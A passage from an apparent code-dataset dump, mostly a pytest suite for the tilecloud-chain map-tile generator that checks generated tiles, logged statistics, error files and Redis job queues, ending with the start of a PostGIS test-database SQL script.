[0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: 22 Kio\n Time per tile: [0-9]+ ms\n Size per tile: 806 o\n\n \"\"\",\n )\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test-nosns.yaml -t 1 -l polygon2 -z 2\".format(d),\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/%s/default/2012/swissgrid_01/%s/%i/%i.png\",\n tiles=list(zip(repeat(\"polygon2\", len(x3)), repeat(\"0_1\", len(x3)), x3, y3)),\n regex=True,\n expected=r\"\"\"The tile generation of layer 'polygon2 \\(DATE=2012\\)' is finish\n Nb generated metatiles: 1\n Nb metatiles dropped: 0\n Nb generated tiles: 64\n Nb tiles dropped: 24\n Nb tiles stored: 40\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: 32 Kio\n Time per tile: [0-9]+ ms\n Size per tile: 818 o\n\n \"\"\",\n )\n log_capture.check()\n\n def test_empty_bbox(self) -> None:\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles %s -c tilegeneration/test-nosns.yaml \"\n \"-l point_hash --bbox 700000 250000 800000 300000\" % d,\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/%s\",\n tiles=[],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'point_hash \\(DATE=2012\\)' is finish\n Nb generated metatiles: 0\n Nb metatiles dropped: 0\n Nb generated tiles: 0\n Nb tiles dropped: 0\n Nb tiles stored: 0\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n\n \"\"\",\n )\n # Second time for the debug mode\n log_capture.check(\n (\"tilecloud_chain\", \"WARNING\", \"bounds empty for zoom 0\"),\n (\"tilecloud_chain\", \"WARNING\", \"bounds 
empty for zoom 1\"),\n (\"tilecloud_chain\", \"WARNING\", \"bounds empty for zoom 2\"),\n (\"tilecloud_chain\", \"WARNING\", \"bounds empty for zoom 3\"),\n )\n\n def test_zoom(self) -> None:\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test-nosns.yaml -l point_hash --zoom 1\".format(d),\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/%s/default/2012/swissgrid_5/%i/%i/%i.png\",\n tiles=[(\"point_hash\", 1, 11, 14), (\"point_hash\", 1, 15, 8)],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'point_hash \\(DATE=2012\\)' is finish\n Nb generated metatiles: 1\n Nb metatiles dropped: 0\n Nb generated tiles: 64\n Nb tiles dropped: 62\n Nb tiles stored: 2\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: [89][0-9][0-9] o\n Time per tile: [0-9]+ ms\n Size per tile: 4[0-9][0-9] o\n\n \"\"\",\n )\n log_capture.check()\n\n def test_zoom_range(self) -> None:\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test-nosns.yaml -l point_hash --zoom 1-3\".format(d),\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/%s/default/2012/swissgrid_5/%i/%i/%i.png\",\n tiles=[\n (\"point_hash\", 1, 11, 14),\n (\"point_hash\", 1, 15, 8),\n (\"point_hash\", 2, 29, 35),\n (\"point_hash\", 2, 39, 21),\n (\"point_hash\", 3, 58, 70),\n (\"point_hash\", 3, 78, 42),\n ],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'point_hash \\(DATE=2012\\)' is finish\n Nb generated metatiles: 9\n Nb metatiles dropped: 4\n Nb generated tiles: 320\n Nb tiles dropped: 314\n Nb tiles stored: 6\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: 2.[0-9] Kio\n Time per tile: [0-9]+ ms\n Size per tile: 4[0-9][0-9] o\n\n \"\"\",\n )\n log_capture.check()\n\n def test_no_zoom(self) -> None:\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_tiles_generated(\n cmd=(\n \".build/venv/bin/generate_tiles {} -c tilegeneration/test-nosns.yaml -l point_hash\"\n ).format(d),\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/%s/default/2012/swissgrid_5/%i/%i/%i.png\",\n tiles=[\n (\"point_hash\", 0, 5, 7),\n (\"point_hash\", 0, 7, 4),\n (\"point_hash\", 1, 11, 14),\n (\"point_hash\", 1, 15, 8),\n (\"point_hash\", 2, 29, 35),\n (\"point_hash\", 2, 39, 21),\n (\"point_hash\", 3, 58, 70),\n (\"point_hash\", 3, 78, 42),\n ],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'point_hash \\(DATE=2012\\)' is finish\n Nb generated metatiles: 10\n Nb metatiles dropped: 4\n Nb generated tiles: 384\n Nb tiles dropped: 376\n Nb tiles stored: 8\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: 3.[0-9] Kio\n Time per tile: [0-9]+ ms\n Size per tile: 4[0-9][0-9] o\n\n \"\"\",\n )\n log_capture.check()\n\n def test_py_buffer(self) -> None:\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles %s -c tilegeneration/test-nosns.yaml \"\n \"-l point_px_buffer --zoom 0-2\" % d,\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/point_px_buffer/default/2012/swissgrid_5/%i/%i/%i.png\",\n 
tiles=[(0, 5, 7), (0, 7, 4), (1, 11, 14), (1, 15, 8), (2, 29, 35), (2, 39, 21)],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'point_px_buffer \\(DATE=2012\\)' is finish\n Nb generated metatiles: 10\n Nb metatiles dropped: 4\n Nb generated tiles: 384\n Nb tiles dropped: 378\n Nb tiles stored: 6\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: 2.[0-9] Kio\n Time per tile: [0-9]+ ms\n Size per tile: 4[0-9][0-9] o\n\n \"\"\",\n )\n log_capture.check()\n\n def test_zoom_list(self) -> None:\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_tiles_generated(\n cmd=(\n \".build/venv/bin/generate_tiles %s -c tilegeneration/test-nosns.yaml \"\n \"-l point_hash --zoom 0,2,3\" % d\n ),\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/%s/default/2012/swissgrid_5/%i/%i/%i.png\",\n tiles=[\n (\"point_hash\", 0, 5, 7),\n (\"point_hash\", 0, 7, 4),\n (\"point_hash\", 2, 29, 35),\n (\"point_hash\", 2, 39, 21),\n (\"point_hash\", 3, 58, 70),\n (\"point_hash\", 3, 78, 42),\n ],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'point_hash \\(DATE=2012\\)' is finish\n Nb generated metatiles: 9\n Nb metatiles dropped: 4\n Nb generated tiles: 320\n Nb tiles dropped: 314\n Nb tiles stored: 6\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: 2.[0-9] Kio\n Time per tile: [0-9]+ ms\n Size per tile: 4[0-9][0-9] o\n\n \"\"\",\n )\n log_capture.check()\n\n def test_layer_bbox(self) -> None:\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test-nosns.yaml -l polygon -z 0\".format(d),\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/polygon/default/2012/swissgrid_5/0/%i/%i.png\",\n tiles=list(product((5, 6, 7), (4, 5, 6, 7))),\n regex=True,\n expected=r\"\"\"The tile generation of layer 'polygon \\(DATE=2012\\)' is finish\n Nb generated tiles: 12\n Nb tiles dropped: 0\n Nb tiles stored: 12\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: [0-9.]+ Kio\n Time per tile: [0-9.]+ ms\n Size per tile: [69][0-9][0-9] o\n\n \"\"\",\n )\n\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles %s \"\n \"-c tilegeneration/test-nosns.yaml -l polygon -z 0\"\n \" -b 550000 170000 560000 180000\" % d,\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/polygon/default/2012/swissgrid_5/0/%i/%i.png\",\n tiles=[(6, 5), (7, 5)],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'polygon \\(DATE=2012\\)' is finish\n Nb generated tiles: 2\n Nb tiles dropped: 0\n Nb tiles stored: 2\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: 1.[6-9] Kio\n Time per tile: [0-9]+ ms\n Size per tile: [89][0-9][0-9] o\n\n \"\"\",\n )\n\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles %s \"\n \"-c tilegeneration/test-nosns.yaml -l polygon -z 0\"\n \" -b 550000.0 170000.0 560000.0 180000.0\" % d,\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/polygon/default/2012/swissgrid_5/0/%i/%i.png\",\n tiles=[(6, 5), (7, 5)],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'polygon \\(DATE=2012\\)' is finish\n Nb generated tiles: 2\n Nb tiles dropped: 0\n Nb tiles stored: 2\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: 
1.[6-9] Kio\n Time per tile: [0-9]+ ms\n Size per tile: [89][0-9][0-9] o\n\n \"\"\",\n )\n\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test-nosns.yaml -l all -z 0\".format(d),\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/all/default/2012/swissgrid_5/0/%i/%i.png\",\n tiles=[(6, 5), (7, 5)],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'all \\(DATE=2012\\)' is finish\n Nb generated tiles: 2\n Nb tiles dropped: 0\n Nb tiles stored: 2\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: 1.[6-9] Kio\n Time per tile: [0-9]+ ms\n Size per tile: [89][0-9][0-9] o\n\n \"\"\",\n )\n log_capture.check()\n\n def test_hash_generation(self) -> None:\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test-nosns.yaml -l point_hash -z 0\".format(d),\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/point_hash/default/2012/swissgrid_5/0/%i/%i.png\",\n tiles=[(5, 7), (7, 4)],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'point_hash \\(DATE=2012\\)' is finish\n Nb generated metatiles: 1\n Nb metatiles dropped: 0\n Nb generated tiles: 64\n Nb tiles dropped: 62\n Nb tiles stored: 2\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: 9[0-9][0-9] o\n Time per tile: [0-9]+ ms\n Size per tile: [45][0-9][0-9] o\n\n \"\"\",\n )\n log_capture.check()\n\n @pytest.mark.skip(reason=\"Don't test mapnik\")\n def test_mapnik(self):\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test-nosns.yaml -l mapnik -z 0\".format(d),\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/mapnik/default/2012/swissgrid_5/0/%i/%i.png\",\n tiles=list(product((5, 6, 7), (4, 5, 6, 7))),\n regex=True,\n expected=r\"\"\"The tile generation of layer 'mapnik' is finish\n Nb generated tiles: 12\n Nb tiles dropped: 0\n Nb tiles stored: 12\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: 9.7 Kio\n Time per tile: [0-9]+ ms\n Size per tile: 823 o\n\n \"\"\",\n )\n log_capture.check()\n\n @pytest.mark.skip(reason=\"Don't test mapnik\")\n def test_mapnik_grid(self):\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test-nosns.yaml -l mapnik_grid -z 0\".format(d),\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/mapnik_grid/default/2012/swissgrid_5/0/%i/%i.json\",\n tiles=list(product((5, 6, 7), (4, 5, 6, 7))),\n regex=True,\n expected=r\"\"\"The tile generation of layer 'mapnik_grid' is finish\n Nb generated tiles: 12\n Nb tiles dropped: 0\n Nb tiles stored: 12\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: 4.5 Kio\n Time per tile: [0-9]+ ms\n Size per tile: 385 o\n\n \"\"\",\n )\n with open(\"/tmp/tiles/1.0.0/mapnik_grid/default/2012/swissgrid_5/0/5/5.json\") as f:\n self.assert_result_equals(\n f.read(),\n '{\"keys\": [\"\", \"1\"], \"data\": {\"1\": {\"name\": \"polygon1\"}}, \"grid\": [\" \"'\n ', \" \", \" \", \" \", \" \"'\n ', \" \", \" \", \" \", \" \"'\n ', \" \", \" \", \" \", \" \"'\n ', \" \", 
\"!!!!!!!!!!!!!!!!\", \"!!!!!!!!!!!!!!!!\"]}',\n )\n with open(\"/tmp/tiles/1.0.0/mapnik_grid/default/2012/swissgrid_5/0/6/5.json\") as f:\n self.assert_result_equals(\n f.read(),\n '{\"keys\": [\"1\"], \"data\": {\"1\": {\"name\": \"polygon1\"}}, \"grid\": [\" \"'\n ', \" \", \" \", \" \", \" \"'\n ', \" \", \" \", \" \", \" \"'\n ', \" \", \" \", \" \", \" \"'\n ', \" \", \" \", \" \"]}',\n )\n log_capture.check()\n\n @pytest.mark.skip(reason=\"Don't test mapnik\")\n def test_mapnik_grid_drop(self):\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test-nosns.yaml -l mapnik_grid_drop -z 0\".format(d),\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/mapnik_grid_drop/default/2012/swissgrid_5/0/%i/%i.json\",\n tiles=((5, 7), (7, 4)),\n regex=True,\n expected=r\"\"\"The tile generation of layer 'mapnik_grid_drop' is finish\n Nb generated tiles: 12\n Nb tiles dropped: 10\n Nb tiles stored: 2\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: 768 o\n Time per tile: [0-9]+ ms\n Size per tile: 384 o\n\n \"\"\",\n )\n log_capture.check()\n\n def test_not_authorised_user(self) -> None:\n for d in (\"-d\", \"-q\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_cmd_exit_equals(\n cmd=f\".build/venv/bin/generate_tiles {d} -c tilegeneration/test-authorised.yaml\",\n main_func=generate.main,\n )\n log_capture.check(\n (\n \"tilecloud_chain.generate\",\n \"ERROR\",\n \"not authorized, authorized user is: www-data.\",\n )\n )\n\n def test_verbose(self) -> None:\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.run_cmd(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test-nosns.yaml -t 2 -v -l polygon\".format(d),\n main_func=generate.main,\n )\n log_capture.check()\n\n def test_time(self) -> None:\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test.yaml --time 2 -l polygon\".format(d),\n main_func=generate.main,\n expected=r\"\"\"size: 770\n size: 862\n size: 862\n size: 862\n time: [0-9]*\n size: 862\n size: 862\n \"\"\",\n regex=True,\n empty_err=True,\n )\n log_capture.check()\n\n def test_time_layer_bbox(self) -> None:\n for d in (\"-d\", \"\"):\n with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_tiles {} \"\n \"-c tilegeneration/test.yaml --time 2 -l all\".format(d),\n main_func=generate.main,\n expected=r\"\"\"size: 1010\n size: 1010\n size: 1010\n size: 1010\n time: [0-9]*\n size: 1010\n size: 1010\n \"\"\",\n regex=True,\n empty_err=True,\n )\n log_capture.check()\n\n # def test_daemonize(self):\n # with LogCapture(\"tilecloud_chain\", level=30) as log_capture:\n # self.assert_cmd_equals(\n # cmd='.build/venv/bin/generate_tiles %s -c tilegeneration/test.yaml -t 1 --daemonize' % d,\n # main_func=generate.main,\n # expected=r\"\"\"Daemonize with pid [0-9]*.\"\"\",\n # regex=True)\n # log_capture.check()\n\n def _touch(self, tiles_pattern: str, tiles: List[Tuple[int, int]]) -> None:\n for tile in tiles:\n path = tiles_pattern % tile\n directory = os.path.dirname(path)\n if not os.path.exists(directory):\n os.makedirs(directory)\n with open(path, \"w\"):\n pass\n\n def test_delete_meta(self) -> 
None:\n for d in (\"-d\", \"\"):\n if os.path.exists(\"/tmp/tiles/\"):\n shutil.rmtree(\"/tmp/tiles/\")\n self._touch(\n tiles_pattern=\"/tmp/tiles/1.0.0/point_hash_no_meta/default/2012/swissgrid_5/0/%i/%i.png\",\n tiles=list(product(range(12), range(16))),\n )\n self.assert_tiles_generated_deleted(\n cmd=(\n \".build/venv/bin/generate_tiles %s -c tilegeneration/test-nosns.yaml \"\n \"-l point_hash_no_meta -z 0\" % d\n ),\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/point_hash_no_meta/default/2012/swissgrid_5/0/%i/%i.png\",\n tiles=[(5, 7), (7, 4)],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'point_hash_no_meta \\(DATE=2012\\)' is finish\nNb generated tiles: 247\nNb tiles dropped: 245\nNb tiles stored: 2\nNb tiles in error: 0\nTotal time: [0-9]+:[0-9][0-9]:[0-9][0-9]\nTotal size: [89][0-9][0-9] o\nTime per tile: [0-9]+ ms\nSize per tile: 4[0-9][0-9] o\n\n\"\"\",\n )\n\n def test_delete_no_meta(self) -> None:\n for d in (\"-d\", \"\"):\n if os.path.exists(\"/tmp/tiles/\"):\n shutil.rmtree(\"/tmp/tiles/\")\n self._touch(\n tiles_pattern=\"/tmp/tiles/1.0.0/point_hash_no_meta/default/2012/swissgrid_5/0/%i/%i.png\",\n tiles=list(product(range(12), range(16))),\n )\n self.assert_tiles_generated_deleted(\n cmd=(\n \".build/venv/bin/generate_tiles %s -c tilegeneration/test-nosns.yaml \"\n \"-l point_hash_no_meta -z 0\" % d\n ),\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/point_hash_no_meta/default/2012/swissgrid_5/0/%i/%i.png\",\n tiles=[(5, 7), (7, 4)],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'point_hash_no_meta \\(DATE=2012\\)' is finish\nNb generated tiles: 247\nNb tiles dropped: 245\nNb tiles stored: 2\nNb tiles in error: 0\nTotal time: [0-9]+:[0-9][0-9]:[0-9][0-9]\nTotal size: [89][0-9][0-9] o\nTime per tile: [0-9]+ ms\nSize per tile: 4[0-9][0-9] o\n\n\"\"\",\n )\n\n def test_error_file_create(self) -> None:\n tile_mbt = os.environ[\"TILE_NB_THREAD\"]\n metatile_mbt = os.environ[\"METATILE_NB_THREAD\"]\n os.environ[\"TILE_NB_THREAD\"] = \"1\"\n os.environ[\"METATILE_NB_THREAD\"] = \"1\"\n\n if os.path.exists(\"error.list\"):\n os.remove(\"error.list\")\n self.assert_main_except_equals(\n cmd=\".build/venv/bin/generate_tiles -q -c tilegeneration/test-nosns.yaml -l point_error\",\n main_func=generate.main,\n regex=True,\n get_error=True,\n expected=[\n [\n \"error.list\",\n \"\\n\".join(\n [\n r\"# \\[[0-9][0-9]-[0-9][0-9]-20[0-9][0-9] [0-9][0-9]:[0-9][0-9]:[0-9][0-9]\\] \"\n r\"Start the layer 'point_error' generation\",\n r\"0/0/0:\\+8/\\+8 config_file=tilegeneration/test-nosns.yaml dimension_DATE=2012 \"\n r\"host=localhost layer=point_error # \\[[0-9][0-9]-[0-9][0-9]-20[0-9][0-9] \"\n r\"[0-9][0-9]:[0-9][0-9]:[0-9][0-9]\\] 'WMS server error: msWMSLoadGetMapParams\\(\\): \"\n r\"WMS server error\\. Invalid layer\\(s\\) given in the LAYERS parameter\\. \"\n r\"A layer might be disabled for this request\\. Check wms/ows_enable_request \"\n r\"settings\\.'\",\n r\"0/0/8:\\+8/\\+8 config_file=tilegeneration/test-nosns.yaml dimension_DATE=2012 \"\n r\"host=localhost layer=point_error # \\[[0-9][0-9]-[0-9][0-9]-20[0-9][0-9] \"\n r\"[0-9][0-9]:[0-9][0-9]:[0-9][0-9]\\] 'WMS server error: msWMSLoadGetMapParams\\(\\): \"\n r\"WMS server error\\. Invalid layer\\(s\\) given in the LAYERS parameter\\. \"\n r\"A layer might be disabled for this request\\. 
Check wms/ows_enable_request \"\n r\"settings\\.'\",\n r\"0/8/0:\\+8/\\+8 config_file=tilegeneration/test-nosns.yaml dimension_DATE=2012 \"\n r\"host=localhost layer=point_error # \\[[0-9][0-9]-[0-9][0-9]-20[0-9][0-9] \"\n r\"[0-9][0-9]:[0-9][0-9]:[0-9][0-9]\\] 'WMS server error: msWMSLoadGetMapParams\\(\\): \"\n r\"WMS server error\\. Invalid layer\\(s\\) given in the LAYERS parameter\\. \"\n r\"A layer might be disabled for this request\\. Check wms/ows_enable_request settings\\.'\",\n \"\",\n ]\n ),\n ]\n ],\n )\n\n os.environ[\"TILE_NB_THREAD\"] = tile_mbt\n os.environ[\"METATILE_NB_THREAD\"] = metatile_mbt\n\n def test_error_file_use(self) -> None:\n tile_mbt = os.environ[\"TILE_NB_THREAD\"]\n metatile_mbt = os.environ[\"METATILE_NB_THREAD\"]\n main_congifile = os.environ[\"TILEGENERATION_MAIN_CONFIGFILE\"]\n os.environ[\"TILE_NB_THREAD\"] = \"1\"\n os.environ[\"METATILE_NB_THREAD\"] = \"1\"\n os.environ[\"TILEGENERATION_MAIN_CONFIGFILE\"] = \"tilegeneration/test-nosns.yaml\"\n\n try:\n if os.path.exists(\"error.list\"):\n os.remove(\"error.list\")\n\n with open(\"error.list\", \"w\") as error_file:\n error_file.write(\n \"# comment\\n\"\n \"0/0/0:+8/+8 config_file=tilegeneration/test-nosns.yaml dimension_DATE=2012 layer=point_hash \"\n \"# comment\\n\"\n \"0/0/8:+8/+8 config_file=tilegeneration/test-nosns.yaml dimension_DATE=2012 layer=point_hash\\n\"\n \"0/8/0:+8/+8 config_file=tilegeneration/test-nosns.yaml dimension_DATE=2012 layer=point_hash\\n\"\n )\n\n self.assert_tiles_generated(\n cmd=\".build/venv/bin/generate_tiles -d --tiles error.list\",\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/point_hash/default/2012/swissgrid_5/%i/%i/%i.png\",\n tiles=[(0, 5, 7), (0, 7, 4)],\n regex=True,\n expected=r\"\"\"The tile generation is finish\n Nb generated metatiles: 3\n Nb metatiles dropped: 1\n Nb generated tiles: 128\n Nb tiles dropped: 126\n Nb tiles stored: 2\n Nb tiles in error: 0\n Total time: [0-9]+:[0-9][0-9]:[0-9][0-9]\n Total size: [89][0-9][0-9] o\n Time per tile: [0-9]+ ms\n Size per tile: [45][0-9][0-9] o\n\n \"\"\",\n )\n finally:\n os.environ[\"TILE_NB_THREAD\"] = tile_mbt\n os.environ[\"METATILE_NB_THREAD\"] = metatile_mbt\n os.environ[\"TILEGENERATION_MAIN_CONFIGFILE\"] = main_congifile\n\n def test_multy(self) -> None:\n for d in (\"-v\", \"\"):\n self.assert_tiles_generated(\n cmd=f\".build/venv/bin/generate_tiles {d} -c tilegeneration/test-multidim.yaml\",\n main_func=generate.main,\n directory=\"/tmp/tiles/\",\n tiles_pattern=\"1.0.0/multi/default/%s/swissgrid/%i/%i/%i.png\",\n tiles=[\n (\"point1\", 0, 5, 7),\n (\"point1\", 1, 11, 14),\n (\"point1\", 2, 29, 35),\n (\"point2\", 0, 7, 4),\n (\"point2\", 1, 15, 8),\n (\"point2\", 2, 39, 21),\n ],\n regex=True,\n expected=r\"\"\"The tile generation of layer 'multi \\(POINT_NAME=point1 - POINT_NAME=point2\\)' is finish\nNb generated metatiles: 16\nNb metatiles dropped: 10\nNb generated tiles: 384\nNb tiles dropped: 378\nNb tiles stored: 6\nNb tiles in error: 0\nTotal time: [0-9]+:[0-9][0-9]:[0-9][0-9]\nTotal size: 2.9 Kio\nTime per tile: [0-9]+ ms\nSize per tile: 498 o\n\n\"\"\",\n )\n\n def test_redis(self) -> None:\n RedisTileStore(sentinels=[[\"redis_sentinel\", 26379]]).delete_all()\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_tiles -c tilegeneration/test-redis.yaml --role master -l point\",\n main_func=generate.main,\n regex=False,\n expected=\"\"\"The tile generation of layer 'point (DATE=2012)' is finish\nNb of generated jobs: 10\n\n\"\"\",\n )\n\n 
self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_controller -c tilegeneration/test-redis.yaml --status\",\n main_func=controller.main,\n regex=False,\n expected=\"\"\"Approximate number of tiles to generate: 10\nApproximate number of generating tiles: 0\nTiles in error:\n\"\"\",\n )\n\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_tiles -c tilegeneration/test-redis.yaml --role slave\",\n main_func=generate.main,\n regex=True,\n expected=r\"\"\"The tile generation is finish\nNb generated metatiles: 10\nNb metatiles dropped: 0\nNb generated tiles: 640\nNb tiles dropped: 0\nNb tiles stored: 640\nNb tiles in error: 0\nTotal time: 0:\\d\\d:\\d\\d\nTotal size: \\d+ Kio\nTime per tile: \\d+ ms\nSize per tile: \\d+ o\n\n\"\"\",\n )\n\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_controller -c tilegeneration/test-redis.yaml --status\",\n main_func=controller.main,\n regex=False,\n expected=\"\"\"Approximate number of tiles to generate: 0\nApproximate number of generating tiles: 0\nTiles in error:\n\"\"\",\n )\n\n def test_redis_main_config(self) -> None:\n main_congifile = os.environ[\"TILEGENERATION_MAIN_CONFIGFILE\"]\n os.environ[\"TILEGENERATION_MAIN_CONFIGFILE\"] = \"tilegeneration/test-redis-main.yaml\"\n\n try:\n RedisTileStore(sentinels=[[\"redis_sentinel\", 26379]]).delete_all()\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_tiles -c tilegeneration/test-redis-project.yaml --role master -l point\",\n main_func=generate.main,\n regex=False,\n expected=\"\"\"The tile generation of layer 'point (DATE=2012)' is finish\n Nb of generated jobs: 10\n\n \"\"\",\n )\n\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_controller -c tilegeneration/test-redis-project.yaml --status\",\n main_func=controller.main,\n regex=False,\n expected=\"\"\"Approximate number of tiles to generate: 10\n Approximate number of generating tiles: 0\n Tiles in error:\n \"\"\",\n )\n\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_tiles -c tilegeneration/test-redis-project.yaml --role slave\",\n main_func=generate.main,\n regex=True,\n expected=r\"\"\"The tile generation is finish\n Nb generated metatiles: 10\n Nb metatiles dropped: 0\n Nb generated tiles: 640\n Nb tiles dropped: 0\n Nb tiles stored: 640\n Nb tiles in error: 0\n Total time: 0:\\d\\d:\\d\\d\n Total size: \\d+ Kio\n Time per tile: \\d+ ms\n Size per tile: \\d+ o\n\n \"\"\",\n )\n\n self.assert_cmd_equals(\n cmd=\".build/venv/bin/generate_controller -c tilegeneration/test-redis-project.yaml --status\",\n main_func=controller.main,\n regex=False,\n expected=\"\"\"Approximate number of tiles to generate: 0\n Approximate number of generating tiles: 0\n Tiles in error:\n \"\"\",\n )\n finally:\n os.environ[\"TILEGENERATION_MAIN_CONFIGFILE\"] = main_congifile\n" }, { "alpha_fraction": 0.575501561164856, "alphanum_fraction": 0.7444561719894409, "avg_line_length": 46.349998474121094, "blob_id": "501b07a5757c1fc4e8bd1a30261a4e99ec155c81", "content_id": "a5d07437b28d676bdfbb1ea788cf584bc4a22cb6", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 947, "license_type": "permissive", "max_line_length": 160, "num_lines": 20, "path": "/docker/test-db/10_init.sql", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "CREATE EXTENSION postgis;\n\nCREATE SCHEMA tests;\n\nCREATE TABLE tests.point (gid serial Primary KEY, name varchar(10));\nSELECT AddGeometryColumn('tests', 